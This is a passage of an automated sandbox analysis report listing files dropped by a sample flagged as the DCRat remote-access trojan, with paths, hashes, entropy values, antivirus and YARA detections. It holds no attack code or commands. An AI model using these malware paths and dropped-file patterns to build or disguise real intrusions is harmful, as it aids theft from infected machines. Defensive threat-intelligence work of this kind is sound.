                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (324), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                        Entropy (8bit):5.83733551215271
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:RTZksO/qSRJGwIahYdBnNSpK2orZPl37PGP9yP+Fh3NfXn:hZkbCicwIaaDnX9P8h3JXn
                                                                                                                                                                        MD5:AF39D87C3C2E16FEFC1E4048000D658B
                                                                                                                                                                        SHA1:4BBC1BE9423FAF6D6B2F2524E8CCE1B8A74EE120
                                                                                                                                                                        SHA-256:7687372E048942EE0BCF1D2CFA76945EFC692D8063A6E963B40B9F37851921C2
                                                                                                                                                                        SHA-512:FA53EBA070D9007053916667E4325C6149ECA9D6B8082D2B7E8F35CDFE39B729808F1FEA58D323549F0988EA3F8DE3685A14E607CCF6EFCE63448E9228842B60
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                        Entropy (8bit):1.307351937440065
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvre:KooCEYhgYEL0In
                                                                                                                                                                        MD5:05EEF47FF622703720FCEF8C3141D4EB
                                                                                                                                                                        SHA1:8A4B99D7EBF6985F9BC8D0373CD7F09BB19379C6
                                                                                                                                                                        SHA-256:CF3D9ECD03159A5D32EF6D529681FC4EFBB5C7E140F5E4628E392064BF7A206A
                                                                                                                                                                        SHA-512:90B3D72FA8F920CEAB079B27D69DB1FFB8C2D959F059BC54835134087450B1495860D1DB9A936EAA96BD868288F313B70974A31BE8B21E35E1902424C35179F9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:C:\ProgramData\Microsoft\Network\Downloader\
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8c974f07, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                        Entropy (8bit):0.42216716764723916
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                                                                                        MD5:5F87CAB3534B090C778A2AF75F6E98C0
                                                                                                                                                                        SHA1:6A154D9D61977A8EAF7534D819BFE1A86AA94530
                                                                                                                                                                        SHA-256:62BCAFDBCFA0DF4F454EEDA0D8E336519E511FA3E72BCC4012C43FA364059D43
                                                                                                                                                                        SHA-512:D84141872059E244EE4C2260A0AC9677E7E411A6EAD48AB2BB72A68B9F1A58BB00CB5D49C66BBD3A374CF7B0DDE55ED573499ED3F740949E334B5CB19E689E41
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:OpenPGP Public Key
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                        Entropy (8bit):0.07688828236553058
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:eryKYe5VkY0aukjn13a/HePmk3/l/lollcVO/lnlZMxZNQl:eryKz5VkYFv53qomiGOewk
                                                                                                                                                                        MD5:9E63E1EC350851FE511B2D6A53D6CFEE
                                                                                                                                                                        SHA1:8B62E4189718D9713E1B4EE5376DD9522B5518C3
                                                                                                                                                                        SHA-256:0E5B3B8DA0D374C93EB4D144C2D57826E2AA4C76D152ADF9E234630E28726C26
                                                                                                                                                                        SHA-512:D556DD88D99D138E886ED01718C2E37C9744B4B2011F728A5A1F71CC2A74217237F103784AAB73B6993CBF21DB6F602B336069C7416DB6DD1A5D87909882D72A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (680), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):680
                                                                                                                                                                        Entropy (8bit):5.896280632150148
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:b9Vi6IUQcS2wEeMr3tJmDNDsbEcQHq63iRvKdDOls1iPPsIix4FOQ+W5BMYw3oVN:h06H02wEbuNxq63i0Gt8fqOQBTpf
                                                                                                                                                                        MD5:5E0F8EC42F058DF45582F0FF536F0281
                                                                                                                                                                        SHA1:1DA02966C0412F6114E19440E5E54A25E7B450CD
                                                                                                                                                                        SHA-256:00D91A1D92D51586F603500C91A208CB48F063F748308AD9C984119BB150A320
                                                                                                                                                                        SHA-512:2078D6C9507260154AC650E89D564694972A4D7565434C052EA6D8331C62A014643EC8A795CDF3233B1E093FCD8E91D7F4EDD9518441A8350409F825A26F35AA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1698
                                                                                                                                                                        Entropy (8bit):5.367720686892084
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                                                                                                                                        MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                                                                                                                                        SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                                                                                                                                        SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                                                                                                                                        SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                                                        MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                                                        SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                                                        SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                                                        SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
